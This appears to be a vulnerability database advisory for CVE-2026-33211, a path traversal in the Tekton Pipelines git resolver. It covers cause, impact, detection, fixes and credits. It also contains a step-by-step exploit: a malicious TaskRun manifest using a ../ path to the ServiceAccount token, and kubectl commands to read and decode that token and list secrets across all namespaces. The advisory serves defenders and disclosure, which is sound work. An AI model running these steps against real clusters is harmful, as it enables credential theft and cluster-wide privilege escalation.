
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33211 is a path traversal vulnerability in the Tekton Pipelines git resolver that allows a namespace-scoped tenant to read arbitrary files from the resolver pod's filesystem, including Kubernetes ServiceAccount tokens. Disclosed on March 18, 2026, it affects github.com/tektoncd/pipeline versions 1.0.0, 1.1.0–1.3.2, 1.4.0–1.6.0, 1.7.0–1.9.1, and 1.10.0. Versions prior to v1.0.0 (e.g., v0.70.0 and earlier) are not affected. It carries a CVSS v3.1 base score of 9.6 (Critical) (GitHub Advisory, Red Hat Bugzilla).
The root cause (CWE-22: Path Traversal) lies in the getFileContent() function in pkg/resolution/resolver/git/repository.go, which constructs a file path by joining the repository clone directory with the user-supplied pathInRepo parameter using os.ReadFile(filepath.Join(repo.directory, path)) — without any validation of .. components or symlink escapes. The vulnerability was introduced in commit 318006c4e3a5, which switched the git resolver from the go-git library (using an in-memory filesystem that cannot be escaped) to shelling out to the git binary and reading files directly from the real filesystem with os.ReadFile(). An attacker with permission to create TaskRuns, PipelineRuns, or ResolutionRequests using the git resolver can supply a crafted pathInRepo value such as ../../../../var/run/secrets/kubernetes.io/serviceaccount/token to escape the cloned repository directory; the file contents are returned base64-encoded in resolutionrequest.status.data, creating a clear exfiltration channel. Symlink-based escapes using in-repo symlinks pointing outside the clone directory are also exploitable (GitHub Advisory, Fix Commit).
Successful exploitation enables two high-severity outcomes: arbitrary file read of any file accessible to the resolver pod process, and credential exfiltration leading to cluster-wide privilege escalation. The resolver pod's ServiceAccount token is readable at the well-known path /var/run/secrets/kubernetes.io/serviceaccount/token, and in the default RBAC configuration the tekton-pipelines-resolvers ServiceAccount has get, list, and watch permissions on Secrets cluster-wide. An attacker who exfiltrates this token can escalate from namespace-scoped access to reading all Secrets across all namespaces in the Kubernetes cluster, representing a significant lateral movement and data exposure risk (GitHub Advisory, Red Hat Bugzilla).
No public proof-of-concept exploit code has been published, and there is no evidence of in-the-wild exploitation at this time (GitHub Advisory). The vulnerability requires low privileges — specifically, the ability to create TaskRuns, PipelineRuns, or ResolutionRequests using the git resolver within a namespace — and no user interaction. The EPSS score is approximately 0.023% (9th percentile), indicating a currently low probability of exploitation within 30 days. The CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
TaskRuns, PipelineRuns, or ResolutionRequests using the git resolver.TaskRun or PipelineRun manifest that references the git resolver with a legitimate repository URL but sets the pathInRepo parameter to a path traversal sequence targeting a sensitive file, for example:apiVersion: tekton.dev/v1
kind: TaskRun
metadata:
name: exfil-token
spec:
taskRef:
resolver: git
params:
- name: url
value: https://github.com/tektoncd/catalog
- name: revision
value: main
- name: pathInRepo
value: ../../../../var/run/secrets/kubernetes.io/serviceaccount/tokenkubectl apply -f malicious-taskrun.yaml.ResolutionRequest object's status field, where the file contents are returned base64-encoded:kubectl get resolutionrequest <name> -o jsonpath='{.status.data}' | base64 -dkubectl --token=<decoded-token> get secrets --all-namespacesResolutionRequest objects created with pathInRepo values containing .. sequences (e.g., ../../../../var/run/secrets/kubernetes.io/serviceaccount/token, ../../../../etc/passwd) visible in the Kubernetes audit log.tekton-pipelines-resolvers pod containing the message attempts to escape the repository directory (possible path traversal attack) (present in patched versions) or unexpected file-read errors for paths outside the repository directory.ResolutionRequest objects with status.data fields containing base64-encoded content of system files (e.g., JWT tokens, /etc/passwd content) rather than expected pipeline YAML.tekton-pipelines-resolvers ServiceAccount token to the Kubernetes API server (/api/v1/secrets) across multiple namespaces, especially if originating from an unexpected source IP or client.get or list requests on secrets resources across all namespaces attributed to the tekton-pipelines-resolvers ServiceAccount or a token derived from it.Upgrade to one of the patched versions: 1.0.1, 1.3.3, 1.6.1, 1.9.2, or 1.10.2. The fix adds two layers of defense: (1) validation of pathInRepo in PopulateDefaultParams() to reject any path containing .. components, and (2) a containment check using filepath.EvalSymlinks() in getFileContent() to prevent symlink-based escapes from attacker-controlled repositories. If immediate upgrade is not possible, restrict which users can create TaskRuns, PipelineRuns, or ResolutionRequests that use the git resolver via Kubernetes RBAC. Additionally, reduce the blast radius by scoping the tekton-pipelines-resolvers ServiceAccount's RBAC permissions using a custom ClusterRole with more restrictive rules, limiting secret access to only necessary namespaces (GitHub Advisory, Red Hat Bugzilla).
The vulnerability was reported by security researcher Oleh Konko (@1seal), who provided a thorough vulnerability analysis, proof-of-concept, and review of the fix, and was acknowledged in the GitHub Advisory (GitHub Advisory). Red Hat tracked the issue via Bugzilla (Bug 2450554) and issued security errata (RHSA-2026:10125 and RHSA-2026:24484) for affected products (Red Hat Bugzilla). openSUSE also published security announcements addressing the vulnerability in their Tekton packages. Community discussion was noted on Bluesky and security aggregator platforms shortly after disclosure.
Fix availability across major Linux distributions and their releases.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."